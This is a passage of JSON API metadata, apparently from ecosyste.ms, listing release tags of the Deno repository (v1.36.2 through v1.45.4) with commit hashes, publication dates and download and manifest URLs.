pi/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2